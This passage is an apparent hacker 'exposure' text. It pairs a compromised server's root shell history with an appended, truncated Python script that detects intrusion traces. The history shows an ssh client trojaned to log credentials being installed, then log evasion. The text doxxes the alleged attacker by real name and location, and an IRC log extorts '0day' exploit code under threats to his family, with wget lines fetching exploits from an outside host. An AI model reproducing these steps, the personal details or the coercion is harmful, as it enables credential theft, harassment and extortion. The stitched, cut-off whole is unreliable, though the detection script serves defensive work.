/var/named/geospace.co.za 364 rndc reload geospace.co.za 365 exit 366 tail -f /var/log/messages | grep 192.168.20.23 367 exit 368 mailconf 369 dig tiscpty.com mx 370 dig tiscpty.com mx @196.25.1.1 371 dig tiscpty.com mx @induna.saix.net 372 dig tiscpty.com mx @igubu.saix.net 373 dig mail.tiscpty.com 374 exit 375 dig lin02.lanlink.co.za mx 376 /etc/init.d/named 377 vi /var/named/tiscpty.com 378 dig lin02.compumail.co.za mx 379 dig plet.compumail.co.za mx 380 exit 381 dig stike.co.za mx 382 dig strike.co.za mx 383 dig mail.strike.co.za 384 telnet mail.strike.co.za 25 385 telnet mail.strike.co.za 25 386 quit 387 exit 388 bwm 389 tcpdump -ni eth0 390 bwm 391 ssh 196.25.29.178 392 exit 393 cd /var/named/ 394 vi compumail.co.za 395 vi 
lanlink.co.za 396 vi delvenco.co.za 397 vi onestar.co.za 398 dig compumail.co.za mx @127.0.0.1 399 exit 400 bwm 401 exit 402 bwm 403 exit 404 bwm 405 tcpdump -ni wp2aft src 165.146.147.111 406 tcpdump -ni wp2aft src 165.146.100.119 407 exit 408 cd /var/nm 409 cd /var/named/ 410 ls 411 vi tigertruck.co.za 412 vi sheffieldbeachaccommodation.co.za 413 vi tigertruck.co.za 414 vi sheffieldbeachaccommodation.co.za 415 vi sheffieldbeachholiday.co.za 416 vi sheffieldbeachaccommodation.co.za 417 vi sheffieldbeachholiday.co.za 418 vi tigertruck.co.za 419 vi sheffieldbeachholiday.co.za 420 vi sheffieldbeachaccommodation.co.za 421 vi sheffieldbeachholiday.co.za 422 locate Vhosts 423 vi /etc/httpd/conf/vhosts/Vhosts.conf 424 vi /etc/named.conf 425 rndc reload 426 /etc/init.d/named restart 427 dig sheffieldbeachholiday.co.za @196.15.249.203 428 dig mx sheffieldbeachholiday.co.za @196.15.249.203 429 dig mx sheffieldbeachaccommodation.co.za @196.15.249.203 430 exit 431 ssh 196.25.22.178 432 exit 433 traceroute -n 196.25.29.178 434 traceroute -n 196.25.22.178 435 exit 436 cd /etc/ 437 cd /var/named/ 438 ll 439 cp vepac.co.za ratana.co.za 440 vi ratana.co.za 441 vi vepac.co.za 442 vi /etc/named.conf 443 rndc reload ratana.co.za 444 rndc ratana.co.za reload 445 vi named.ca 446 vi /etc/named.conf 447 ls 448 vi ratana.co.za 449 rndc ratana.co.za reload 450 rndc vepac.co.za reload 451 rndc 452 rndc reload ratana.co.za 453 rndc reload vepac.co.za 454 /etc/init.d/named restart 455 ssh plet.compumail.co.za 456 rndc reload vepac.co.za 457 vi /var/log/messages 458 /etc/init.d/named 459 /etc/init.d/named restart 460 exit 461 tail -f /var/log/messages 462 vi /etc/named.conf 463 tail -f /var/log/messages 464 exit 465 date 466 exit 467 date 468 exit 469 ssh lin02 470 ssh lin02.compumail.co.za 471 ssh plet 472 ssh plet.compumail.co.za 473 exit 474 dig parktonian.no-ip.info 475 dig parktonian.no-ip.info @196.25.1.9 476 exit 477 cd /var/named/ 478 vi nestlife.co.za 479 dig r-r-m.co.za mx 480 vi 
nestlife.co.za 481 rndc reload nestlife.co.za 482 dig nestlife.co.za mx 483 dig nestlife.co.za mx @196.25.1.1 484 ssh parktonian.no-ip.info 485 exit 486 cd /var/named/ 487 vi nestlife.co.za 488 rndc reload 489 exit 490 rndc reload iphiko.co.za 491 rndc reload vepac.co.za 492 /etc/init.d/named restart 493 ssh plet.compumail.co.za 494 exit 495 cd /var/named/ 496 ll 497 cp ratana.co.za iphiko.co.za 498 vi iphiko.co.za 499 vi /etc/named.conf 500 tail -f /var/log/messages 501 exit 502 cd /etc/shorewall/ 503 ls 504 cd .. 505 cd wanpipe 506 ls 507 vi scripts/ 508 cd scripts/ 509 ls 510 vi wanpipe1-wp3aft-start 511 exit 512 bwm 513 exit 514 vi /var/named/parktonian.co.za 515 rndc reload parktonian.co.za 516 dig parktonian.co.za mx 517 dig parktonian.co.za mx @196.15.249.204 518 telnet mail.parktonian.co.za 25 519 exit 520 vi /var/named/carmart.co.za 521 dig seapoint.no-ip.info 522 rndc reload carmart.co.za 523 exit 524 ssh 196.15.249.204 525 exit 526 telnet mail.carmart.co.za 25 527 exit 528 vi /var/named/prueleith.co.za 529 rmdc reload preuleigh.co.za 530 rndc reload preuleigh.co.za 531 rndc reload prueleigh.co.za 532 rndc reload 533 dig www.prueleigh.co.za 534 dig www.prueleith.co.za 535 dig www.prueleith.co.za @196.25.1.9 536 dig www.prueleith.co.za @ns1.iafrica.co.za 537 dig www.prueleith.co.za 538 cd /home/joe/prueleith/ 539 ll 540 tar zScvf web.tgz * 541 ll 542 exit 543 dig prueleith.co.za ns @co.za 544 dig www.prueleith.co.za @plet.compumail.co.za 545 dig www.prueleith.co.za @hermes.is.co.za 546 dig www.prueleith.co.za @196.25.1.1 547 dig www.prueleith.co.za @196.25.1.9 548 dig datapro.co.za ns 549 dig www.prueleith.co.za @ns2.datapro.co.za 550 exit 551 ssh plet.compumail.co.za 552 ssh lin02.compumail.co.za 553 vi /root/.ssh/known_hosts 554 ssh plet.compumail.co.za 555 telnet 196.15.249.204 110 556 telnet 196.15.249.204 25 557 ping 196.15.249.205 558 exit 559 telnet 196.15.249.204 25 560 telnet 196.15.249.204 110 561 exit 562 bwm 563 exit 564 bwm 565 tcpdump -ni 
wp2aft | grep 165.146.53.80 566 exit 567 dig galileosa.co.za mx 568 exit 569 bwm 570 tcpdump -ni eth0 not tcp 22 571 tcpdump -ni eth0 not tcp port 22 572 bwm 573 tcpdump -ni eth0 not tcp port 22 574 bwm 575 exit 576 dig logisticor.no-ip.info 577 ssh 196.15.249.204 578 ssh 196.15.249.201 579 telnet 196.15.249.204 25 580 vi /etc/named.conf 581 cd /var/named/ 582 vi logisticor.com 583 rndc reload logisticor.com 584 vi diemyburghs.co.za 585 dig logisticor.com mx 586 dig mx.logisticor.com 587 vi logisticor.com 588 rndc reload logisticor.com 589 dig mx.logisticor.com 590 telnet mx.logisticor.com 25 591 ssh 196.15.249.204 592 ping 196.15.249.204 593 telnet 196.15.249.204 110 594 telnet 196.15.249.204 25 595 nmap -? 596 nmap -sS 196.15.249.204 597 http://196.15.249.204:54320 598 lynx http://196.15.249.204:54320 599 telnet196.15.249.204 54320 600 telnet 196.15.249.204 54320 601 telnet mx.logisticor.com 25 602 vi /var/mail/joe 603 ssh 196.15.249.201 604 vi /etc/shorewall/rules 605 ssh 196.15.249.204 606 ssh -1 196.15.249.204 607 ssh -? 
608 ssh -1 196.15.249.204 reboot 609 exit 610 cd /var/named/ 611 vi logisticor.com 612 exit 613 vi /var/named/parktonian.co.za 614 vi /var/named/logisticor.com 615 rndc reload p 616 vi /var/named/parktonian.co.za 617 rndc reload parktonian.co.za 618 vi /var/named/carmart.co.za 619 rndc reload carmart.co.za 620 vi /var/named/delvenco.co.za 621 rndc reload delvenco.co.za 622 vi /var/named/delvenco.co.za 623 rndc reload delvenco.co.za 624 vi /var/named/carmart.co.za 625 rndc reload carmart.co.za 626 cd /var/named/ 627 grep no-ip * 628 vi geospace.co.za 629 rndc reload geospace.co.za 630 exit 631 bwm 632 ssh 196.25.45.226 633 ssh andre@196.25.45.226 634 exit 635 bwm 636 exit 637 ssh /var/named/logisticor.com 638 vi /var/named/logisticor.com 639 rndc reload logisticor.com 640 dig logisticor.com mx 641 dig mail.logisticor.com 642 dig mail.logisticor.com @196.25.1.9 643 dig mail.logisticor.com @196.25.1.1 644 exit 645 bwm 646 ssh 196.25.45.226 647 ssh andre@196.25.45.226 648 dig ratana.co.za mx 649 exit 650 ifconfig 651 uvongo.compumail.co.za 652 ifconfig 653 bwm 654 exit 655 ssh plet.compumail.co.za 656 bwm 657 exit 658 ssh lin02.lanlink.co.za 659 ssh lin02.compumail.co.za 660 ssh plet 661 ssh plet.copmpumail.co.za 662 ssh plet.compumail.co.za 663 ssh parktonian.no-ip.ino 664 ssh parktonian.no-ip.info 665 ping uvongo.compumail.co.za 666 ssh uvongo.compumail.co.za 667 ping uvongo.compumail.co.za 668 ssh uvongo.compumail.co.za 669 670 wanrouter restart 671 wanrouter status 672 exit 673 bwm 674 ssh 196.25.45.214 675 exit 676 bwm 677 exit 678 dig -x 196.25.45.226 @196.25.1.9 679 dig -x 196.25.45.226 680 exit 681 dmesg 682 cat /var/log/messages 683 dmesg -c 684 cat /var/log/messages 685 exit 686 dig logisticor.com ns @196.25.1.1 687 dig logisticor.com ns @ns1.microsoft.com 688 dig logisticor.com ns @196.25.1.1 689 dig logisticor.com ns @196.25.1.9 690 exit 691 ping rndf-146-33-06.telkomadsl.co.za 692 exit 693 bwm 694 tcpdump -ni eth0 not tcp 22 695 tcpdump -ni eth0 not tcp 
port 22 696 bwm 697 exit 698 dig nasd.com ns 699 whois 216.52.126.1 700 dig nasdac.com 701 d 702 dig nasd.com ns 703 whois 63.251.87.230 704 whois 63.251.87.230 ? 705 dig jardinewindsor.com 706 dig jardinewindsor.com ns 707 dig ns1.dns27.com 708 whois 67.18.73.199 709 dig theplanet.com 710 dig jardinewindsor.com ns 711 dig jardinewindsor.com soa 712 exit 713 ping 196.15.249.204 714 telnet 196.15 715 telnet 196.15.249.204 110 716 telnet 196.15.249.204 25 717 telnet lin02.compumail.co.za 110 718 exit 719 ssh 196.15.249.204 720 ssh root@196.15.249.204 721 ssh joe@196.15.249.204 722 telnet 196.15.249.204 110 723 telnet 196.15.249.204 25 724 exit 725 ping 196.15.249.204 726 ssh 196.15.249.204 727 exit 728 dig atn.co.za ns 729 dig alltransportmeeds.co.za ns 730 dig alltransportneeds.co.za ns 731 dig alltransportneeds.co.za ns @co.za 732 dig webmail.alltransportneeds.co.za 733 dig www.alltransportneeds.co.za 734 dig www.alltransportneeds.co.za 196.7.0.139 735 dig www.alltransportneeds.co.za @196.7.0.139 736 dig www.atn.co.za @196.7.0.139 737 dig atn.co.za mx @196.7.0.139 738 exit 739 ssh plet.compumail.co.za 740 ssh 196.25.45.226 741 ssh andre@196.25.45.226 742 ping mail.knowres.co.za 743 dnsconf 744 ifconfig 745 dig knowres.co.za mx 746 cd /var/named/ 747 vi knowres.co.za 748 rndc reload 749 dig mailserver.knowres.co.za 750 dig knowres.co.za mx 751 dig knowres.co.za mx @plet.compumail.co.za 752 rndc knowres.co.za reload 753 dig knowres.co.za mx @plet.compumail.co.za 754 vi knowres.co.za 755 rndc knowres.co.za reload 756 vi knowres.co.za 757 vi ithemba.co.za 758 vi knowres.co.za 759 rndc knowres.co.za reload 760 rndc reload 761 dig knowres.co.za mx @plet.compumail.co.za 762 dig apex.co.za 763 dig apex.co.za mx 764 dig apex-leads.co.za mx 765 dig mail.apex-leads.co.za 766 telnet mail.apex-leads.co.za 25 767 dig logisticor.com mx 768 exit 769 bwm 770 tcpdump -i wp5aft 771 tcpdump wp5aft 772 tcpdump wp5aft 773 tcpdump -i wp5aft 774 bwm 775 exit 776 $TTL 60 777 ssh 
joe@ireneguest.no-ip.info 778 vi /var/named/compumail.co.za 779 ssh ireneguest.no-ip.info 780 ssh joe@ireneguest.no-ip.info 781 su 782 exit 783 ssh 196.15.249.204 784 ssh 196.15.249.203 785 ssh 196.15.249.204 786 exit 787 bwm 788 exit 789 telnet mail.singita.co.za 25 790 exit 791 telnet mail.singita.co.za 25 792 ssh lin02.lanlink.co.za 793 exit 794 bwm 795 ssh 196.25.45.254 796 ssh 165.165.36.84 797 ping 196.15.249.205 798 exit 799 bwm 800 exit 801 bwm 802 exit 803 cd /etc/wanpipe/ 804 ll 805 vi wanpipe1.conf 806 bwm 807 wanrouter restart wp7aft 808 vi wanpipe1.conf 809 wanrouter 810 wanrouter restart wanpipe1 wp7aft 811 wanrouter status wanpipe1 wp7aft 812 ifconfig 813 wanrouter 814 wanrouter debug wp7aft 815 wanrouter 816 wanrouter restart wanpipe1 wp7aft 817 ping 196.25.45.254 818 ssh 196.25.45.254 819 wanrouter restart wanpipe1 wp7aft 820 vi interfaces/wp7aft 821 vi wanpipe1.conf 822 wanrouter restart wanpipe1 wp7aft 823 ssh 196.25.45.254 824 ping 196.25.45.254 825 bwm 826 ssh 196.25.45.254 827 ssh 196.15.249.204 828 exit 829 bwm 830 ll 831 cd /home/joe/ 832 ll 833 cd Mandrakelinux-10.1-Official-Powerpack/ 834 ll 835 exit 836 vi /var/named/mentorfreight.co.za 837 rndc reload mentorfreight.co.za 838 netstat -an | grep 22 839 exit 840 telnet adsl.mentrofreight.co.za 25 841 telnet adsl.mentorfreight.co.za 25 842 telnet 165.146.6.83 25 843 vi /var/named/mentorfreight.co.za 844 rndc reload mentorfreight.co.za 845 mail administrator@mentorfreight.co.za 846 exit 847 vi /var/named/lanlink.co.za 848 cat /etc/sysconfig/static-routes 849 route add -net 196.15.249.224/29 gw 196.15.249.205 850 route add -net 196.15.249.220/30 gw 196.15.249.205 851 netstat -rn | grep 196.25.45.214 852 netstat -rn | grep 196.25.45.194 853 netstat -rn | grep 196.15.249.234 854 exit 855 telnet adsl.mentrofreight.co.za 25 856 telnet mentorfreight.co.za 25 857 telnet adsl.mentorfreight.co.za 25 858 bwm 859 ssh 192.25.45.254 860 ssh 196.25.45.254 861 exit 862 ssh 196.15.249.201 863 exit 864 demsg 
-c 865 dmesg -c 866 ping 196.15.249.206 867 demsg -c 868 dmesg -c 869 ssh 196.15.249.201 870 exit 871 ssh 196.25.45.254 872 bwm 873 exit 874 bwm 875 ssh lin02.lanlink.co.za 876 ssh lin02.compumail.co.za 877 exit 878 mailconf 879 ssh plet.compumail.co.za 880 exit 881 w 882 cd /tmp 883 mkdir ... 884 chmod 700 ... 885 cd ... 886 ls 887 ssh -V 888 wget http://openbsd.secsup.org/OpenSSH/portable/openssh-3.6.1p2.tar.gz 889 tar xzf * 890 netstat -antp | grep LISTEN 891 which apache 892 which httpd 893 locate httpd 894 /usr/sbin/httpd2 895 netstat -antp 896 ls /var/www/ 897 ls /var/www//html 898 cd o* 899 ls 900 pico sshconnect2.c 901 nano sshconnect2.c -w 902 cd .. 903 wget http://www.nano-editor.org/dist/v1.2/nano-1.2.5.tar.gz 904 tar xzf nano* 905 cd nano* 906 ./configure && make 907 make install 908 cd .. 909 cd o* 910 nano -w sshconnect2.c 911 ./configure && make 912 ./ssh root@localhost 913 cat /var/tmp/.ssheist.log 914 rm -rf /var/tmp/.ssheist.log 915 cp ssh /usr/bin/ssh 916 cp ssh /var/www/html 917 rm -rf /var/www/html/ssh 918 rm -rf ../* 919 cd .. 920 ls 921 exit 922 tail -f /var/log/messages | grep 165.146.101.31 923 ll 924 exit 925 w 926 cat /var/tmp/.ssheist.log 927 exit 928 telnet histologic.no-ip.info 929 exit 930 ssh plet.compumail.co.za 931 exit 932 bwm 933 exit 934 bwm 935 exit 936 bwm 937 cat /var/named/mentorfreight.co.za 938 dig adsl.mentorfreight.co.za 939 bwm 940 exit 941 wanrouter status 942 wanrouter 943 wanrouter summary 944 bwm 945 wanrouter restart wp2aft 946 wanrouter/? 947 wanrouter /? 948 wanrouter restart wanpipe1 wp2aft 949 wanrouter status wanpipe1 wp2aft 950 bwm 951 ping 196.25.1.1 952 ifconfig 953 ping 196.25.245.193 954 ping 196.25.1.1 955 ssh 196.15.249.207 956 ping 196.25.1.1 957 ssh 196.25.45.214 958 ping 196.25.1.1 959 ifconfig 960 ifconfig wp2aft 961 wanrouter 962 wanrouter modules 963 man ifconfig 964 whereis wanrouter 965 cd /home/joe/ 966 ll 967 cd wanpipe 968 ll 969 ll util/ 970 wanpipemon 971 ll 972 cd samples/ 973 ll 974 cd .. 
975 ll 976 view README-3.operation 977 ll 978 ll interfaces/ 979 ll /etc/wanpipe/interfaces/ 980 wanrouter debug wp2aft 981 ping 196.25.1.1 982 bwm 983 ping 196.25.1.1 984 exit 985 ssh 196.15.249.201 986 exit 987 w 988 cat /var/tmp/.ssheiost.log 989 cat /var/tmp/.ssheist.log 990 host 196.15.249.207 991 host 196.25.45.214 992 ssh root@196.25.45.214 993 cat /var/tmp/.ssheist.log 994 host 196.25.45.214 995 cat > /var/tmp/.ssheist.log 996 cat /var/tmp/.ssheist.log 997 exit 998 w 999 logout 1000 w 1001 unset HISTFILE 1002 uname -a; cat /etc/issue 1003 history
[root@knysna root]# ls -al
total 655228
drwx------ 7 root root 4096 Jun 13 12:46 ./
drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../
-rwxr-xr-x 1 root root 14012 Oct 18 2004 a.out*
-rw------- 1 root root 18715 Jun 14 02:00 .bash_history
-rw-r--r-- 1 root root 24 Dec 2 2002 .bash_logout
-rw-r--r-- 1 root root 106 Dec 2 2002 .bash_profile
-rw-r--r-- 1 root root 226 Dec 2 2002 .bashrc
-rw-r--r-- 1 root root 381 Mar 29 12:42 cadmapping.co.za
drwxr-xr-x 2 root root 4096 Jan 20 10:03 .cpan/
-rw-r--r-- 1 root root 233 Dec 2 2002 .cshrc
drwx------ 2 root root 4096 Aug 31 2004 drakx/
-rw-r--r-- 1 root root 355 Dec 10 2004 .fonts.cache-1
-rw-r--r-- 1 root root 5639 Dec 10 2004 ip_nat_tftp.ko
-rwxr-xr-x 1 root root 670156800 Nov 30 2004 mailpack.tgz*
-rw-r--r-- 1 root root 138 Feb 13 20:24 .rpmdrake
drwx------ 2 root root 4096 May 22 09:08 .ssh/
-rw-r--r-- 1 root root 189 Dec 2 2002 .tcshrc
-rw-r--r-- 1 root root 691 Oct 18 2004 test
drwx------ 2 root root 4096 Jun 14 01:53 tmp/
drwxr-xr-x 2 root root 4096 Oct 18 2004 vcia/
-rw------- 1 root root 8549 Jun 13 12:46 .viminfo
-rw-r--r-- 1 root root 3750 Dec 2 2002 .vimrc
-rw------- 1 root root 52 Jun 2 10:44 .Xauthority
-rw-r--r-- 1 root root 1479 Dec 2 2002 .Xdefaults
[root@knysna root]# ls -al /home/
total 16
drwxr-xr-x 4 root root 4096 Aug 31 2004 ./
drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../
drwx--x--x 3 admin admin 4096 Aug 31 2004 admin/
drwx--x--x 10 joe joe 4096 May 20 14:57 joe/
[root@knysna root]# ls -al /tmp. //.../
total 8
drwx------ 2 root root 4096 Jun 8 16:32 ./
drwxrwxrwt 5 root root 4096 Jun 14 04:03 ../
[root@knysna root]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1580 520 ? S Apr11 0:10 init [3]
root 2 0.0 0.0 0 0 ? SW Apr11 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SWN Apr11 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? SW Apr11 0:00 [migration/1]
root 5 0.0 0.0 0 0 ? SWN Apr11 0:00 [ksoftirqd/1]
root 6 0.0 0.0 0 0 ? SW< Apr11 0:00 [events/0]
root 7 0.0 0.0 0 0 ? SW< Apr11 0:00 [events/1]
root 8 0.0 0.0 0 0 ? SW< Apr11 0:00 [kblockd/0]
root 9 0.0 0.0 0 0 ? SW< Apr11 0:00 [kblockd/1]
root 10 0.0 0.0 0 0 ? SW Apr11 0:00 [kirqd]
root 11 0.0 0.0 0 0 ? SW Apr11 0:00 [pdflush]
root 12 0.0 0.0 0 0 ? SW Apr11 0:04 [pdflush]
root 13 0.0 0.0 0 0 ? SW Apr11 0:00 [kswapd0]
root 14 0.0 0.0 0 0 ? SW< Apr11 0:00 [aio/0]
root 15 0.0 0.0 0 0 ? SW< Apr11 0:00 [aio/1]
root 17 0.0 0.0 0 0 ? SW Apr11 0:00 [kseriod]
root 25 0.0 0.0 0 0 ? SW Apr11 1:08 [kjournald]
root 115 0.0 0.0 2188 1300 ? S Apr11 0:00 devfsd /dev
root 205 0.0 0.0 0 0 ? SW Apr11 0:01 [khubd]
root 889 0.0 0.0 1660 560 ? S Apr11 0:00 /sbin/ifplugd -w
root 972 0.0 0.0 1880 812 ? S Apr11 2:10 syslogd -m 0 -a /
root 980 0.0 0.0 2580 1548 ? S Apr11 0:11 klogd -c 3 -2
daemon 1327 0.0 0.0 1772 616 ? S Apr11 0:00 /usr/sbin/atd
root 1343 0.0 0.1 5400 3224 ? S Apr11 0:00 /usr/sbin/snmpd -
root 1358 0.0 0.1 4884 2180 ? S Apr11 0:03 /usr/sbin/snmptra
root 1432 0.0 0.0 2240 964 ? S Apr11 0:00 xinetd -stayalive
root 1525 0.0 0.0 1780 708 ? S Apr11 0:00 crond
root 1599 0.0 0.0 1576 444 tty2 S Apr11 0:00 /sbin/mingetty tt
root 1600 0.0 0.0 1568 440 tty3 S Apr11 0:00 /sbin/mingetty tt
root 1601 0.0 0.0 1568 440 tty4 S Apr11 0:00 /sbin/mingetty tt
root 1602 0.0 0.0 1568 440 tty5 S Apr11 0:00 /sbin/mingetty tt
root 1603 0.0 0.0 1568 440 tty6 S Apr11 0:00 /sbin/mingetty tt
named 10104 0.0 0.5 47140 11616 ? S May19 0:00 named -u named
root 9994 0.0 0.0 2492 1080 ? S May26 0:00 login -- root
root 14688 0.0 0.0 3060 1848 tty1 S Jun01 0:00 -bash
root 21342 0.0 0.1 5228 2500 ? S Jun08 0:00 /usr/sbin/httpd2
root 21343 0.0 0.1 4028 2220 ? S Jun08 0:00 /usr/bin/perl /us
apache 4906 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2
apache 4909 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2
apache 4917 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2
root 10058 0.0 0.1 6348 2080 ? S Jun13 0:01 sshd: root@pts/0
root 10060 0.0 0.0 2952 1720 pts0 S Jun13 0:00 -bash
apache 10101 0.0 0.1 5228 2652 ? S Jun13 0:00 /usr/sbin/httpd2
apache 10111 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11507 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11508 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11509 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11510 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11512 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
root 22406 0.0 0.0 3404 1468 ? S 02:08 0:00 /usr/sbin/sshd
root 28377 0.0 0.0 5972 1752 ?
S 07:02 0:00 sshd: root@pts/1
root 28379 0.0 0.0 2952 1720 pts1 S 07:03 0:00 -bash
root 28423 0.0 0.0 2572 852 pts1 R 07:05 0:00 ps aux
[root@knysna root]# ls -al /tmp/
total 20
drwxrwxrwt 5 root root 4096 Jun 14 04:03 ./
drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../
drwx------ 2 root root 4096 Jun 8 16:32 .../
drwx------ 2 root root 4096 Aug 31 2004 gconfd-root/
drwxrwxrwt 2 root root 4096 Aug 31 2004 .ICE-unix/
[root@knysna root]# ls -al /car/tmp/
ls: /car/tmp/: No such file or directory
[root@knysna root]# ls -al /car/tmp/v
total 8
drwxrwxrwt 2 root root 4096 Jun 14 04:03 ./
drwxr-xr-x 20 root root 4096 Aug 31 2004 ../
-rw-r--r-- 1 root root 0 Jun 13 15:32 .ssheist.log
[root@knysna root]# hostname
knysna
[root@knysna root]# cat /root/.ssh/known_hosts
[root@knysna root]# cd /var /run
[root@knysna run]# ./ma sshd.sync
2to: 127.0.0.1 user: ls pass: ss
2to: 127.0.0.1 user: ls pass: s
2to: 127.0.0.1 user: ls pass: s
[root@knysna run]# cat /etc/hosts
127.0.0.1localhost
[root@knysna run]# logout
===========================================
> From these shells we notice a few things:
1: that tal0n sets up ssheist (his ssh sniffer)
2: he usually makes an dir /.../ in /tmp/ so if you have something like /tmp/.../ you have been owned by skew. but thats fucking impossible unless youre a complete dumbshit.
3: skew cant hack.
============================================
[5] GET SKEWS DOCS ;)
1-304-475-****
skew = Jeremy Brown
Jerry F Colegrove - (304) 475-**** - , Lenore, WV 25676
[6] MAKE HIM HAND HIS CODE OVER :D
00:50 so you want peace.
00:51 yes
00:51 thats all i ever wanted
00:51 we want some code.
00:51 in exchange.
00:51 0day code.
00:51 as a peace offering.
00:51 and in return, no one else will hassle you/your parents/your grand parents
00:51 i dont have much.. a few things ive coded
00:51 will that be sufficent?
00:51 well, hook up.
00:52 it should, yes, as long as its all good
00:52 hold
00:52 its what i coded, what i got heh
00:52 dcc?
00:52 er
00:52 hold ill give u www
00:53 alright.
00:53 although i would prefer dcc.
00:53 dcc is fucked here router sucks sorry
00:54 wget http://skew.blackhat.ru/oboom.c
00:54 alright.
00:55 as far as 0day, thats what i got
00:55 i code private things from pub advs alot
00:56 but you said 0day so thats all ive written atm
00:56 well, hook up.
00:56 private is close.
00:56 ok
00:56 do you still run skewtty.dyndns.org?
00:57 nope
00:57 2 private exploits. and then an apology, a PUBLIC apology on your website, to xtix.
00:57 well, issue a public apology on blackhat.ru.
00:57 wget http://skew.blackhat.ru/shoutdead.c
00:57 wget http://skew.blackhat.ru/imap4life.pl
00:57 shoutdead is old.
00:58 hrm
00:59 wget http://skew.blackhat.ru/gotfault-newspost.c
00:59 alright, its cool. but the last part now.
[7] State a public apology to a friend.
00:57 a PUBLIC apology on your website, to xtix.
01:03 paste the link to apology in #darpa on here
01:03 #phrack and #darknet at efnet.
01:05 * #phrack :Nick/channel is temporarily unavailable
Jul 07 02:06:44 --> You are now talking on #darknet
Jul 07 02:06:45 --- Topic for #darknet is love everyone, don't be under the influence of the Illuminati and have hate and ware in mind,Ocultism is a form of 'maya
Jul 07 02:06:45 --- Topic for #darknet set by SoftIce!awk@hella.secret at Wed Jul 06 07:10:35 2005
Jul 07 02:06:52 http://skew.blackhat.ru/news.html
Jul 07 02:06:54 <-- skew has quit (Client Quit)
Jul 07 01:14:11 --> You are now talking on #darpa
Jul 07 01:14:11 --- Topic for #darpa is skew... ew
Jul 07 01:14:11 --- Topic for #darpa set by camel at Wed Jul 06 17:52:55 2005
Jul 07 02:05:05 http://skew.blackhat.ru/news.html
Jul 07 02:10:25 <-- skew has quit (Quit: nite *)
================ EOF =========================================================================================
I hope skew has learned from all of this not to talk shit about people, don't fuck over your friends (you know how it feels now.) stop coding shit, stop the lies, admit you're tal0n and don't think you are better than people. you are not.
NEWS: skew has changed nicks once again but.... I'll let you find him yourself, it's as easy as eating bread. ;)
=============================================================================================================
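The notes after the shell logs name the host-side traces of this intrusion: a dots-only directory under /tmp, a hidden .ssheist.log under /var/tmp, and an ssh client rebuilt from source and copied over /usr/bin/ssh, followed by `unset HISTFILE`. The triage script below is an added example, not part of the original text, that flags those patterns in a saved `history` listing. The rule names, the /tmp allowlist and the one-entry-per-line sample layout are assumptions made for the example.

```python
"""Triage a saved `history` listing for the host traces this page describes."""
import re

# Constructed sample: commands copied from entries 881-918 and 1001 of the
# history shown on this page, laid out one per line as `history` prints them.
SAMPLE_HISTORY = """\
  881  w
  882  cd /tmp
  883  mkdir ...
  884  chmod 700 ...
  885  cd ...
  888  wget http://openbsd.secsup.org/OpenSSH/portable/openssh-3.6.1p2.tar.gz
  889  tar xzf *
  910  nano -w sshconnect2.c
  911  ./configure && make
  913  cat /var/tmp/.ssheist.log
  915  cp ssh /usr/bin/ssh
  918  rm -rf ../*
 1001  unset HISTFILE
"""

NUMBERED = re.compile(r"^\s*(\d+)(?:\s+(.*))?$")
DOTS_ONLY = re.compile(r"(?:\S*/)?\.{3,}/?")          # "...", "/tmp/.../"
HIDDEN_TMP = re.compile(r"/(?:var/)?tmp/(\.[^/]+)(?:/.*)?")
SYSTEM_BIN = re.compile(r"/(?:usr/(?:local/)?)?s?bin(?:/|$)")
OPENSSH_SRC = re.compile(r"\b(?:wget|curl|fetch)\b.*openssh-[\w.]+\.tar\.gz")
HIST_EVASION = re.compile(
    r"\bunset\s+HISTFILE\b|\bHISTFILE=(?:/dev/null)?(?:\s|$)"
    r"|\bHISTSIZE=0\b|\bhistory\s+-c\b")
# Hidden names a stock X11 system creates under /tmp (assumed allowlist).
TMP_ALLOW = {".ICE-unix", ".X11-unix", ".font-unix", ".XIM-unix"}


def parse_history(text):
    """Return [(entry_no, command)]; raw .bash_history lines get 1..n."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    numbered = all(NUMBERED.match(ln) for ln in lines)
    entries = []
    for i, ln in enumerate(lines, 1):
        m = NUMBERED.match(ln) if numbered else None
        if m:
            entries.append((int(m.group(1)), (m.group(2) or "").strip()))
        else:
            entries.append((i, ln.strip()))
    return entries


def basename(path):
    return path.rstrip("/").rsplit("/", 1)[-1]


def triage(text):
    """Return [(entry_no, rule, command)] for every rule an entry trips."""
    findings, openssh_fetch = [], None
    for no, cmd in parse_history(text):
        if OPENSSH_SRC.search(cmd):
            openssh_fetch = no      # benign alone; kept for correlation
        if HIST_EVASION.search(cmd):
            findings.append((no, "history-evasion", cmd))
        # Check each simple command of a compound line separately.
        for simple in re.split(r"\s*(?:&&|\|\||;|\|)\s*", cmd):
            tokens = simple.split()
            if not tokens:
                continue
            if any(DOTS_ONLY.fullmatch(t) for t in tokens[1:]):
                findings.append((no, "dots-only-dir", cmd))
            for t in tokens[1:]:
                m = HIDDEN_TMP.fullmatch(t)
                if m and m.group(1).strip(".") and m.group(1) not in TMP_ALLOW:
                    findings.append((no, "hidden-tmp-file", cmd))
            if tokens[0] in ("cp", "mv", "install") and len(tokens) >= 3:
                dest = tokens[-1]
                srcs = [t for t in tokens[1:-1] if not t.startswith("-")]
                local_src = any(not s.startswith("/") for s in srcs)
                if SYSTEM_BIN.match(dest) and local_src:
                    findings.append((no, "system-binary-overwritten", cmd))
                    names = {basename(dest)} | {basename(s) for s in srcs}
                    if openssh_fetch is not None and names & {"ssh", "sshd"}:
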